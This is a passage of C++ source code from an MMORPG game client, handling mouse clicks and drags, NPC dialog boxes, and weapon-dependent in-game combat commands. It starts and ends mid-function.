				if ((msX > 720 + 5) && (msX < 780 + 5) && (msY > 525 + 35 + 2) && (msY < 540 + 35 + 2))
#else
				if ((msX >560) && (msX <620) && (msY>380) && (msY<405)
#endif
					
				{
					if (m_iHP > 0) {
						if ((m_bIsDialogEnabled[12] != TRUE) && (m_iLU_Point > 0))
						{
							EnableDialogBox(12, NULL, NULL, NULL);
								PlaySound('E', 14, 5);
						}
					}
					else
					{
						if (m_cRestartCount == -1)
						{
							m_cRestartCount = 5;
							m_dwRestartCountTime = timeGetTime();
							wsprintf(G_cTxt, DLGBOX_CLICK_SYSMENU1, m_cRestartCount); // "Restarting game....%d"
							AddEventList(G_cTxt, 10);
							PlaySound('E', 14, 5);
						}
					}
					
					m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
					return;
				}
			}
			else if (iRet == -1)
			{
				return;
			}
		}
		else if (cRB != 0)
		{
			iRet = _iCheckDlgBoxFocus(msX, msY, 2);
			if (iRet == 1) return;
		}
		break;
	case DEF_CURSORSTATUS_PRESSED:
		if (cLB == 0) // Normal Click
		{
			m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
		}
		break;
	case DEF_CURSORSTATUS_SELECTED:
		if (cLB == 0)
		{
			if (((dwTime - m_stMCursor.dwSelectClickTime) < DEF_DOUBLECLICKTIME) 	// Double Click
				&& (msX == m_stMCursor.sClickX) && (msY == m_stMCursor.sClickY))
			{
				m_stMCursor.dwSelectClickTime = m_stMCursor.dwSelectClickTime;
				_bCheckDlgBoxDoubleClick(msX, msY);
			}
			else // Click
			{
				// MORLA2 - Secundario Click en Bar Cast
				if (cRB != 0)
					_bCheckDlgBoxClick(msX, msY, 2);
				else {
					_bCheckDlgBoxClick(msX, msY, 1);
					m_stMCursor.sClickX = msX;
					m_stMCursor.sClickY = msY;
				}
			}
			m_stMCursor.dwSelectClickTime = dwTime;
			m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
			if (m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_ITEM)
			{
				_bCheckDraggingItemRelease(msX, msY);
				m_stMCursor.cSelectedObjectType = NULL;
				m_stMCursor.sSelectedObjectID = NULL;
			}
			return;
		}
		if (cLB != 0) 			// v2.05 01-11-30
		{
			if ((m_pMapData->bIsTeleportLoc(m_sPlayerX, m_sPlayerY) == TRUE) && (m_cCommandCount == 0)) goto CP_SKIPMOUSEBUTTONSTATUS;

			if ((m_stMCursor.sPrevX != msX) || (m_stMCursor.sPrevY != msY))
			{
				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_DRAGGING;
				m_stMCursor.sPrevX = msX;
				m_stMCursor.sPrevY = msY;
				if ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX) &&
					((m_stMCursor.sSelectedObjectID == 30) || (m_stMCursor.sSelectedObjectID == 29)))
				{
					m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
				}
				if ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX) &&
					(m_stMCursor.sSelectedObjectID == 7) && (m_stDialogBoxInfo[7].cMode == 1))
				{
					EndInputString();
					m_stDialogBoxInfo[7].cMode = 20;
				}
				// Query Drop Item Amount
				if ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX) &&
					(m_stMCursor.sSelectedObjectID == 17) && (m_stDialogBoxInfo[17].cMode == 1))
					// Guild Menu
				{
					EndInputString();
					m_stDialogBoxInfo[17].cMode = 20;
				}
				return;
			}
			if ((m_cCommand == DEF_OBJECTMOVE) || (m_cCommand == DEF_OBJECTRUN)) goto MOTION_COMMAND_PROCESS;
			return;
		}
		break;
	case DEF_CURSORSTATUS_DRAGGING:
		if (cLB != 0)
		{
			if ((m_pMapData->bIsTeleportLoc(m_sPlayerX, m_sPlayerY) == TRUE) && (m_cCommandCount == 0)) goto CP_SKIPMOUSEBUTTONSTATUS;
			if (m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX)
			{
				m_stDialogBoxInfo[m_stMCursor.sSelectedObjectID].sX = msX - m_stMCursor.sDistX;
				m_stDialogBoxInfo[m_stMCursor.sSelectedObjectID].sY = msY - m_stMCursor.sDistY;
			}
			m_stMCursor.sPrevX = msX;
			m_stMCursor.sPrevY = msY;

			if ((m_cCommand == DEF_OBJECTMOVE) || (m_cCommand == DEF_OBJECTRUN)) goto MOTION_COMMAND_PROCESS;
			return;
		}
		if (cLB == 0) 
		{
			switch (m_stMCursor.cSelectedObjectType) 
			{
			case DEF_SELECTEDOBJTYPE_DLGBOX:
				if ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX) &&
					(m_stMCursor.sSelectedObjectID == 7) && (m_stDialogBoxInfo[7].cMode == 20))
				{
					sX = m_stDialogBoxInfo[7].sX;
					sY = m_stDialogBoxInfo[7].sY;
					StartInputString(sX + 75, sY + 140, 21, m_cGuildName);
					m_stDialogBoxInfo[7].cMode = 1;
				}

				if ((m_stMCursor.cSelectedObjectType == DEF_SELECTEDOBJTYPE_DLGBOX) &&
					(m_stMCursor.sSelectedObjectID == 17) && (m_stDialogBoxInfo[17].cMode == 20))
				{	// Query Drop Item Amount
					sX = m_stDialogBoxInfo[17].sX;
					sY = m_stDialogBoxInfo[17].sY;
					StartInputString(sX + 40, sY + 57, 11, m_cAmountString);
					m_stDialogBoxInfo[17].cMode = 1;
				}

				if (m_stMCursor.sSelectedObjectID == 9)
				{
					{
						if (msX < 400) //LifeX Fix Map
						{
							m_stDialogBoxInfo[9].sX = 0;
						}
						else 
						{
							m_stDialogBoxInfo[9].sX = 800 - m_stDialogBoxInfo[9].sSizeX;
						}

						if (msY < 273)
						{
							m_stDialogBoxInfo[9].sY = 0;
						}
						else 
						{
							m_stDialogBoxInfo[9].sY = 547 - m_stDialogBoxInfo[9].sSizeY;
						}
					}
				}

				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
				m_stMCursor.cSelectedObjectType = NULL;
				m_stMCursor.sSelectedObjectID = NULL;
				break;

			case DEF_SELECTEDOBJTYPE_ITEM:
				_bCheckDraggingItemRelease(msX, msY);
				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
				m_stMCursor.cSelectedObjectType = NULL;
				m_stMCursor.sSelectedObjectID = NULL;
				break;

			default:
				m_stMCursor.cPrevStatus = DEF_CURSORSTATUS_NULL;
				m_stMCursor.cSelectedObjectType = NULL;
				m_stMCursor.sSelectedObjectID = NULL;
				break;
			}
			return;
		}
		break;
	}

CP_SKIPMOUSEBUTTONSTATUS:;
	if (m_bCommandAvailable == FALSE) return;
	if ((dwTime - m_dwCommandTime) < 300)
	{
		delete m_pGSock;
		m_pGSock = NULL;
		m_bEscPressed = FALSE;
		PlaySound('E', 14, 5);
		if (m_bSoundFlag) m_pESound[38]->bStop();
		if ((m_bSoundFlag) && (m_bMusicStat == TRUE))
		{
			StopBGM();	// Snoopy: mp3 support
			if (m_pBGM != NULL) m_pBGM->bStop();
		}
		if (strlen(G_cCmdLineTokenA) != 0)
			ChangeGameMode(DEF_GAMEMODE_ONQUIT);
		else ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
		return;
	}
	if (m_iHP <= 0) return;

	if (m_sDamageMove != 0)
	{
		m_cCommand = DEF_OBJECTDAMAGEMOVE;
		goto MOTION_COMMAND_PROCESS;
	}

	if ((m_pMapData->bIsTeleportLoc(m_sPlayerX, m_sPlayerY) == TRUE) && (m_cCommandCount == 0)) {
		bSendCommand(MSGID_REQUEST_TELEPORT, NULL, NULL, NULL, NULL, NULL, NULL);
		ChangeGameMode(DEF_GAMEMODE_ONWAITINGINITDATA);
	}

	// indexX, indexY
	if (cLB != 0) // Mouse Left button
	{
		if (m_bIsGetPointingMode == TRUE)
		{
			if ((m_sMCX != 0) || (m_sMCY != 0))
				PointCommandHandler(m_sMCX, m_sMCY);
			else PointCommandHandler(indexX, indexY);

			m_bCommandAvailable = FALSE;
			m_dwCommandTime = timeGetTime();
			m_bIsGetPointingMode = FALSE;
			return;
		}

		m_pMapData->bGetOwner(m_sMCX, m_sMCY - 1, cName, &sObjectType, &iObjectStatus, &m_wCommObjectID); // v1.4
		if (memcmp(m_cMCName, m_cPlayerName, 10) == 0 && (sObjectType <= 6 || m_pMapData->m_pData[m_sPlayerX - m_pMapData->m_sPivotX][m_sPlayerY - m_pMapData->m_sPivotY].m_sItemSprite != 0))
		{
			if ((m_sPlayerType >= 1) && (m_sPlayerType <= 6))
			{
				m_cCommand = DEF_OBJECTGETITEM;
				m_sCommX = m_sPlayerX;
				m_sCommY = m_sPlayerY;
			}
		}
		else
		{
			if (memcmp(m_cMCName, m_cPlayerName, 10) == 0) m_sMCY--;
			if ((m_sMCX != 0) && (m_sMCY != 0)) // m_sMCX, m_sMCY
			{
				if (m_bCtrlPressed == TRUE)
				{
					m_pMapData->bGetOwner(m_sMCX, m_sMCY, cName, &sObjectType, &iObjectStatus, &m_wCommObjectID);
					if ((iObjectStatus & 0x10) != 0) return;
					if ((sObjectType == 15) || (sObjectType == 20) || (sObjectType == 24)) return;
					m_stMCursor.sCursorFrame = 3;
					absX = abs(m_sPlayerX - m_sMCX);
					absY = abs(m_sPlayerY - m_sMCY);
					if ((absX <= 1) && (absY <= 1))
					{
						wType = _iGetAttackType();
						m_cCommand = DEF_OBJECTATTACK;
						m_sCommX = m_sMCX;
						m_sCommY = m_sMCY;
					}
					else if ((absX <= 2) && (absY <= 2) // strike on Big mobs & gate from a range
						&& ((sObjectType == 66) || (sObjectType == 73) || (sObjectType == 81) || (sObjectType == 91)))
					{
						wType = _iGetAttackType();
						m_cCommand = DEF_OBJECTATTACK;
						m_sCommX = m_sMCX;
						m_sCommY = m_sMCY;
					}
					else // Pas au corp  corp
					{
						switch (_iGetWeaponSkillType()) {
						case 6: // Bow
							m_cCommand = DEF_OBJECTATTACK;
							m_sCommX = m_sMCX;
							m_sCommY = m_sMCY;
							wType = _iGetAttackType();
							break;

						case 5: // OpenHand
						case 7: // SS
							if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0)))
							{
								if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
								{
									if (m_cSkillMastery[_iGetWeaponSkillType()] == 100)
									{
										m_cCommand = DEF_OBJECTATTACKMOVE;
										wType = _iGetAttackType();
									}
									else
									{
										m_cCommand = DEF_OBJECTRUN;
										GetPlayerTurn();
									}
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
								}
								else
								{
									m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							else
							{
								if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)
									&& (m_sPlayerType >= 1) && (m_sPlayerType <= 6))
									m_cCommand = DEF_OBJECTRUN;	// Staminar
								else m_cCommand = DEF_OBJECTMOVE;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								GetPlayerTurn();
							}
							break;

						case 8: // LS
							if ((absX <= 3) && (absY <= 3) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
								&& (_iGetAttackType() != 30)) // Crit without StormBlade
							{
								wType = _iGetAttackType();
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
							}
							else if ((absX <= 5) && (absY <= 5) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
								&& (_iGetAttackType() == 30))  // Crit with StormBlade (by Snoopy)
							{
								wType = _iGetAttackType();
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
							}
							else if ((absX <= 3) && (absY <= 3)
								&& (_iGetAttackType() == 5))  // Normal hit with StormBlade (by Snoopy)
							{
								wType = _iGetAttackType();
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
							}
							else // Swing
							{
								if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0))
									&& (_iGetAttackType() != 5)) // no Dash possible with StormBlade
								{
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
									{
										if (m_cSkillMastery[_iGetWeaponSkillType()] == 100)
										{
											m_cCommand = DEF_OBJECTATTACKMOVE;
											wType = _iGetAttackType();
										}
										else
										{
											m_cCommand = DEF_OBJECTRUN;
											GetPlayerTurn();
										}
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
									}
									else
									{
										m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
								}
								else
								{
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)
										&& (m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							break;

						case 9: // Fencing
							if ((absX <= 4) && (absY <= 4) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE))
							{
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								wType = _iGetAttackType();
							}
							else {
								if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0))) {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)) {
										if (m_cSkillMastery[_iGetWeaponSkillType()] == 100) {
											m_cCommand = DEF_OBJECTATTACKMOVE;
											wType = _iGetAttackType();
										}
										else {
											m_cCommand = DEF_OBJECTRUN;
											GetPlayerTurn();
										}
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
									}
									else {
										m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
								}
								else {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
										(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							break;

						case 10: // Axe
							if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE))
							{
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								wType = _iGetAttackType();
							}
							else
							{
								if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0)))
								{
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
									{
										if (m_cSkillMastery[_iGetWeaponSkillType()] == 100)
										{
											m_cCommand = DEF_OBJECTATTACKMOVE;
											wType = _iGetAttackType();
										}
										else
										{
											m_cCommand = DEF_OBJECTRUN;
											GetPlayerTurn();
										}
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
									}
									else
									{
										m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
								}
								else
								{
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
										(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							break;
						case 14: // Hammer
							if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								wType = _iGetAttackType();
							}
							else {
								if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0))) {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)) {
										if (m_cSkillMastery[_iGetWeaponSkillType()] == 100) {
											m_cCommand = DEF_OBJECTATTACKMOVE;
											wType = _iGetAttackType();
										}
										else {
											m_cCommand = DEF_OBJECTRUN;
											GetPlayerTurn();
										}
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
									}
									else {
										m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
								}
								else {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
										(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							break;
						case 21: // Wand
							if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
								wType = _iGetAttackType();
							}
							else {
								if (((absX == 2) && (absY == 2)) || ((absX == 0) && (absY == 2)) || ((absX == 2) && (absY == 0))) {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)) {
										if (m_cSkillMastery[_iGetWeaponSkillType()] == 100) {
											m_cCommand = DEF_OBJECTATTACKMOVE;
											wType = _iGetAttackType();
										}
										else {
											m_cCommand = DEF_OBJECTRUN;
											GetPlayerTurn();
										}
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
									}
									else {
										m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
								}
								else {
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
										(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
								}
							}
							break;
						}
					}
				}
				else // CTRL not pressed
				{
					m_pMapData->bGetOwner(m_sMCX, m_sMCY, cName, &sObjectType, &iObjectStatus, &m_wCommObjectID);
					if (sObjectType >= 10 || ((sObjectType >= 1) && (sObjectType <= 6)))
					{
						switch (sObjectType) { 	// CLEROTH - NPC TALK
						case 15: // ShopKeeper-W

							EnableDialogBox(20, 5, 11, 1);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 15;

							break;

						case 19: // Gandlf

							EnableDialogBox(20, 0, 16, NULL);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 19;

							break;

						case 20: // Howard

							EnableDialogBox(20, 0, 14, NULL);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 20;
							m_stDialogBoxInfo[39].sV3 = 20;
							m_stDialogBoxInfo[39].sV4 = m_wCommObjectID;
							m_stDialogBoxInfo[39].sV5 = m_sMCX;
							m_stDialogBoxInfo[39].sV6 = m_sMCY;

							break;

						case 24: // Tom

							EnableDialogBox(20, 5, 11, 2);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 24;
							m_stDialogBoxInfo[39].sV3 = 24;
							m_stDialogBoxInfo[39].sV4 = m_wCommObjectID;
							m_stDialogBoxInfo[39].sV5 = m_sMCX;
							m_stDialogBoxInfo[39].sV6 = m_sMCY;

							break;

						case 25: // William

							EnableDialogBox(20, 0, 13, NULL);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 25;

							break;

						case 26: // Kennedy

							EnableDialogBox(20, 0, 7, NULL);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 26;

							break;

						case 21: // Guard
							if ((_iGetFOE(iObjectStatus) >= 0) && (!m_bIsCombatMode))
							{
								EnableDialogBox(20, 4, NULL, NULL);
								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 800 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif
								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;
								m_stDialogBoxInfo[20].sV3 = 21;
							}
							break;
						case 67: // McGaffin
						case 68: // Perry
						case 69: // Devlin
							if (!m_bIsCombatMode)
							{
								EnableDialogBox(20, 4, NULL, NULL);
								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 800 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif
								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;
								m_stDialogBoxInfo[20].sV3 = sObjectType;
							}
							break;

						case 32: // Unicorn
							if (!m_bIsCombatMode)
							{
								EnableDialogBox(20, 4, NULL, NULL);
								tX = msX - 117;
								tY = msY - 50;
								if (tX < 0) tX = 0;
#ifdef RES_HIGH
								if ((tX + 235) > 800) tX = 800 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 600) tY = 600 - 100;
#else
								if ((tX + 235) > 639) tX = 639 - 235;
								if (tY < 0) tY = 0;
								if ((tY + 100) > 479) tY = 479 - 100;
#endif
								m_stDialogBoxInfo[20].sX = tX;
								m_stDialogBoxInfo[20].sY = tY;
								m_stDialogBoxInfo[20].sV3 = 32;
							}
							break;

						case 90: // Snoopy: Gail

							EnableDialogBox(20, 6, 0, NULL);
							tX = msX - 117;
							tY = msY - 50;
							if (tX < 0) tX = 0;
#ifdef RES_HIGH
							if ((tX + 235) > 800) tX = 800 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 600) tY = 600 - 100;
#else
							if ((tX + 235) > 639) tX = 639 - 235;
							if (tY < 0) tY = 0;
							if ((tY + 100) > 479) tY = 479 - 100;
#endif
							m_stDialogBoxInfo[20].sX = tX;
							m_stDialogBoxInfo[20].sY = tY;
							m_stDialogBoxInfo[20].sV3 = 90;

							break;

						default: // Other mobs
							if (_iGetFOE(iObjectStatus) >= 0) break;
							if ((sObjectType >= 1) && (sObjectType <= 6)) break;
							absX = abs(m_sPlayerX - m_sMCX);
							absY = abs(m_sPlayerY - m_sMCY);
							if ((absX <= 1) && (absY <= 1))
							{
								wType = _iGetAttackType();
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
							}
							else if ((absX <= 2) && (absY <= 2) // strike on Big mobs & gate from a range
								&& ((sObjectType == 66) || (sObjectType == 73) || (sObjectType == 81) || (sObjectType == 91)))
							{
								wType = _iGetAttackType();
								m_cCommand = DEF_OBJECTATTACK;
								m_sCommX = m_sMCX;
								m_sCommY = m_sMCY;
							}
							else // Normal hit from a range.
							{
								switch (_iGetWeaponSkillType()) {
								case 6: // Bow
									m_cCommand = DEF_OBJECTATTACK;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									wType = _iGetAttackType();
									break;

								case 5: // Boxe
								case 7: // SS
									if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0)
										&& (m_sPlayerType >= 1) && (m_sPlayerType <= 6))
										m_cCommand = DEF_OBJECTRUN;
									else m_cCommand = DEF_OBJECTMOVE;
									m_sCommX = m_sMCX;
									m_sCommY = m_sMCY;
									GetPlayerTurn();
									break;

								case 8: // LS
									if ((absX <= 3) && (absY <= 3) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
										&& (_iGetAttackType() != 30)) // Crit without StormBlade by Snoopy
									{
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else if ((absX <= 5) && (absY <= 5) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)
										&& (_iGetAttackType() == 30)) // Crit with StormBlade by Snoopy
									{
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else if ((absX <= 3) && (absY <= 3)
										&& (_iGetAttackType() == 5)) // Normal hit with StormBlade by Snoopy
									{
										m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else
									{
										if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
											(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
											m_cCommand = DEF_OBJECTRUN;
										else m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
									break;

								case 9: // Fencing
									if ((absX <= 4) && (absY <= 4) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE))
									{
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else
									{
										if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
											(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
											m_cCommand = DEF_OBJECTRUN;
										else m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
									break;

								case 10: //
									if ((absX <= 2) && (absY <= 2) && (m_iSuperAttackLeft > 0) && (m_bSuperAttackMode == TRUE)) {
										if ((absX <= 1) && (absY <= 1) && (m_bShiftPressed || m_bRunningMode) && (m_iSP > 0))
											m_cCommand = DEF_OBJECTATTACKMOVE;
										else m_cCommand = DEF_OBJECTATTACK;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										wType = _iGetAttackType();
									}
									else {
										if ((m_bShiftPressed || m_bRunningMode) && (m_iSP > 0) &&
											(m_sPlayerType >= 1) && (m_sPlayerType <= 6))
											m_cCommand = DEF_OBJECTRUN;
										else m_cCommand = DEF_OBJECTMOVE;
										m_sCommX = m_sMCX;
										m_sCommY = m_sMCY;
										GetPlayerTurn();
									}
									break;
								case 14: //
